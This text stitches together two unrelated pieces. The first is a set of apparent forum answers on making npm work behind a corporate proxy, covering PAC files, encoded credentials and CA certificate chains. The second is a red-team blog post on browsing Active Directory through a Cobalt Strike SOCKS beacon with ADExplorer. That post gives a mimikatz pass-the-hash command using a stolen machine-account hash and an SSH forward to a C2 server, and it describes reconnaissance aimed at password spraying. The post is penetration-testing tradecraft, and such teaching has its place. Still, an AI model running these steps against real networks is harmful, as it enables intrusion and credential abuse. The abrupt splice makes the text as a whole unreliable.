Look for the URL of the PAC file in Internet Explorer's LAN settings and download the PAC file from the URL configured. The PAC file is just a JavaScript file with a function named FindProxyForURL which returns different proxy hosts in different scenarios.
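For illustration, a minimal PAC file looks something like this (the host names here are placeholders; your corporate PAC file will contain its own logic):

```
// Minimal PAC sketch: internal hosts bypass the proxy, everything else goes through it.
function FindProxyForURL(url, host) {
    if (dnsDomainIs(host, ".internal.example.com")) {
        return "DIRECT";
    }
    return "PROXY proxy.example.com:8080";
}
```

The "PROXY ..." string returned for your target URL (e.g. registry.npmjs.org) is the proxy host you feed to npm.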
Even though you may log in with your domain and username on your corporate machine, it is quite possible that the proxy does not require your Active Directory domain name, only the username and password (which may differ from your Active Directory login).
I also had to URL-encode my domain\user string. However, I have a space in my username, so I put a + in to encode the space, but it would get double-encoded as %2B (which is the URL encoding for the plus sign; the URL encoding for a space is %20), so I had to do the following instead:
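That is, encode the space as %20 (and the backslash as %5C) directly in the proxy URL. For example (credentials and host are placeholders):

```
npm config set proxy "http://mydomain%5Cuser%20name:mypassword@proxy.example.com:8080"
npm config set https-proxy "http://mydomain%5Cuser%20name:mypassword@proxy.example.com:8080"
```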
It turns out that even with the above configuration, I still had issues with some packages/scripts that use Request (the simplified HTTP client) internally to download things. As the Request readme explains, you can specify environment variables to set the proxy on the command line, and Request will honor those values.
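For example (placeholder credentials and host), on Windows:

```
set HTTP_PROXY=http://user:password@proxy.example.com:8080
set HTTPS_PROXY=http://user:password@proxy.example.com:8080
```

or on Linux/macOS:

```
export HTTP_PROXY="http://user:password@proxy.example.com:8080"
export HTTPS_PROXY="http://user:password@proxy.example.com:8080"
```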
If you want to keep SSL and don't want to use strict-ssl=false, then you have more work to do. For me, I am behind a corporate firewall and we are using self-signed certificates, so I receive the error "unable to get local issuer certificate". If you are in the same boat, then you will need to set the cafile= option in the npm config file. First, you need to create a PEM file which holds information about your self-signed certificates. If you do not know how to do that, here are instructions for a Windows environment without using 3rd-party software:
We need to explicitly indicate which certificates should be trusted because we are using self-signed certificates. For my example, I navigated to www.google.com using Chrome so I could grab the certificates.
In Chrome, go to Inspect -> Security -> View Certificate. You will see all of the certificates that allow the SSL connection. Notice how these certificates are self-signed; the blurred-out part is my company, and we are not a Certificate Authority. You can export the full certificate path as a P7B file, or you can export the certificates individually as CER files (Base64 encoding). Exporting the full path as P7B doesn't do you much good, because you will in turn need to open this file in a certificate manager and export the individual CER files anyway. In Windows, double-clicking the P7B file will open the Certificate Manager application.
You stack the certificates in reverse order from the certificate path. So in the example above, I would start with *.google.com, then paste Websense below it, then Issuing CA 1, and so on. This way the certificates are parsed from top to bottom, searching for the appropriate root CA. Simply including the root CA will not work, but we also do not need to include all the certificates: from the above path, I only need to include those certificates that come before the Websense certificate (Issuing CA 1, Policy CA, Root CA).
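The resulting PEM file is just the Base64 blocks of those exported CER files concatenated in that order (names and path below are placeholders):

```
-----BEGIN CERTIFICATE-----
(Base64 contents of Issuing CA 1.cer)
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
(Base64 contents of Policy CA.cer)
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
(Base64 contents of Root CA.cer)
-----END CERTIFICATE-----
```

Then point npm at it:

```
npm config set cafile "C:\certs\corp-chain.pem"
```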
Now, with your proxies set (HTTP and HTTPS), your registry set to https://registry.npmjs.org/, and cafile pointing at your PEM file, you should be able to install packages behind a corporate firewall with self-signed certificates without nuking the strict-ssl setting.
None of the existing answers explain how to use npm with a PAC file. Some suggest downloading the PAC file, manually inspecting it, and choosing one of the "PROXY ..." strings. But this doesn't work if the PAC file needs to choose from multiple proxies, or if the PAC file contains complex logic to bypass proxies for certain URLs.
The npm proxy setup mentioned in the accepted answer solves the problem, but as you can see in this npm issue, some dependencies use Git, which makes a Git proxy setup necessary as well. It can be done as follows:
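Assuming the same placeholder credentials and proxy host as above:

```
git config --global http.proxy http://user:password@proxy.example.com:8080
git config --global https.proxy http://user:password@proxy.example.com:8080
```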
Because I still had problems with setting proxy settings at work and turning them off at home, I have scripted and published npm-corpo-proxy.sh. In every corporate environment the password has to be changed often and must contain special characters, which must be encoded before being fed to npm config (the same goes for the backslash in domain\user).
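If you want to do the encoding by hand, one quick way (assuming Node is already installed) is:

```
node -e "console.log(encodeURIComponent(process.argv[1]))" "p@ss w0rd"
# prints: p%40ss%20w0rd
```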
I could not make it work with CNTLM. I tried following all the information posted above, but the proxy still did not authorize the connection. With Fiddler, you just have to install it and check the Automatically Authenticate option. But for it to work, I had to remove the .npmrc file from my user folder and set the environment variables as indicated here, with these values:
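Assuming Fiddler's default listening address of 127.0.0.1:8888 (check Tools > Options > Connections for the actual port), the variables would look like:

```
set HTTP_PROXY=http://127.0.0.1:8888
set HTTPS_PROXY=http://127.0.0.1:8888
```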
There are many answers here, and most of them are the same. My problem was that everything worked fine when I was connected to my company's VPN or working in the office, but it failed when I was on a public internet connection.
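In that situation, one common fix (a sketch of the idea; these are standard npm commands) is to simply remove the proxy settings when you are off the corporate network:

```
npm config delete proxy
npm config delete https-proxy
```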
ADExplorer is a tool I have always had in my backpack. It can be useful for both offensive and defensive purposes, but in this post, I am going to focus more on its offensive use. The tool itself can be found here: https://learn.microsoft.com/en-us/sysinternals/downloads/adexplorer
A typical scenario I often face on engagements is that I have compromised a server or workstation and am able to get my hands on the local NTLM hashes, as well as the NTLM hash of the computer account the machine uses to authenticate against the Active Directory domain. One way I typically end up in this scenario is by proxychaining through a beacon on a user's workstation and using a known exploit to gain administrative access.
So, how do we use the Active Directory computer account over SOCKS to look at Active Directory? Well, of course there are many tools out there such as Impacket or LDAPPER, but today I'll be covering ADExplorer.
The C2 server should now have port 4444 open, allowing proxy traffic through into the network where you have the beacon. I recommend using iptables to only allow SSH into the C2 server (a topic I will not cover in this post, so I recommend Googling how to do that). Do not allow access to port 50050 (the Cobalt Strike team server port) or 4444 directly from the Internet; instead, use SSH and forward those ports. To set up a local port that is forwarded to 4444 on the C2 server over SSH, I simply run the following SSH command:
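A typical local forward would look like this (username and host are placeholders):

```
ssh -L 4444:127.0.0.1:4444 user@c2server
```

After this, pointing Proxifier at 127.0.0.1:4444 on your own machine sends the traffic through the SSH tunnel to the SOCKS port on the C2 server.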
Once that is taken care of, you open up Proxification Rules and make sure that both Localhost and Default are set to Direct. Once that is verified, add a new proxification rule by clicking the Add button.
Next, I am going to fire up ADExplorer.exe, but since I am using a machine account hash instead of a username and password, I will need to inject the hash. If you know a username and password, however, you could simply start ADExplorer and fill out the server IP address in the Connect to field along with the user and password.
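One common way to launch a process with an injected NTLM hash (named here as an example; the domain, account, and hash are placeholders) is mimikatz's pass-the-hash module:

```
sekurlsa::pth /user:WS01$ /domain:corp.local /ntlm:<machine account NTLM hash> /run:ADExplorer.exe
```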
ADExplorer should now launch, and all I need to fill in is the IP address of the domain controller in the Connect to field. Since I have injected the hash into the process, ADExplorer will use the current authentication context of the process, so you should not need to fill in a user or password.
Hit OK, and if you did everything correctly, you should be able to browse Active Directory over SOCKS with ADExplorer using a machine account hash. You can verify that traffic is flowing by looking at Proxifier. If you want to use a port other than the default 389, you can specify it by appending a colon and the port to the address (for example, 192.168.86.22:636). It is preferable to use LDAPS whenever you can, by using 636 as the port.
Looking at Active Directory over a SOCKS proxy can sometimes be very slow, so I often take a snapshot instead. The snapshot takes a copy of everything it can read from Active Directory and stores it in a file on disk on the local machine you are running ADExplorer from; all of that data travels over the proxy, so take bandwidth into consideration before doing it. To do this, highlight the connection (192.168.86.22 [DC1.oddvar.moe] in my case), then click File > Create Snapshot.
Fill in a path to store the dump and press OK. This could, of course, take a while if the Active Directory database is rather big. For a company with around 30,000 users, it is not uncommon for the dump to be over 800 MB in size. Once the dump is finished, I can open up the dump offline at any time using ADExplorer without the need to connect to the environment over the proxy. Instead of filling in connection details, I simply choose 'Enter the path of a previous snapshot to load' when starting ADExplorer.
In the early stages of an engagement, I typically do not know all the subnets or geographical locations of the organization. One place where this is stored (if the sysadmins decided to implement it) is inside Active Directory. Sites are implemented so that Active Directory can set up the best possible replication topology and direct authentication requests to domain controllers residing in the same site as the user or computer authenticating. To find the sites, I browse to the Configuration partition and look at the Sites container, as shown in the following screenshot.
By highlighting the domain, I can see interesting details about it, such as the password policy settings or the ms-DS-MachineAccountQuota. The password policy can be overridden if the customer is using fine-grained password policies, so be sure to check for that before starting a password spray based on this policy.
By default, all authenticated accounts in Active Directory can add computers to the domain, and ms-DS-MachineAccountQuota is the attribute that determines how many computers a given account can add (10 by default). This can be restricted in other places, such as Group Policy, but it is worth checking what the value is. If it is 0, normal users cannot add computers to the domain.
If you are curious about whether there are trusts in play, you can search for objects whose objectClass is set to trustedDomain, as in the screenshot below.
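For reference, the equivalent LDAP filter is (objectClass=trustedDomain); outside ADExplorer you could run the same query with ldapsearch (base DN and host are placeholders):

```
ldapsearch -H ldap://192.168.86.22 -b "DC=corp,DC=local" "(objectClass=trustedDomain)"
```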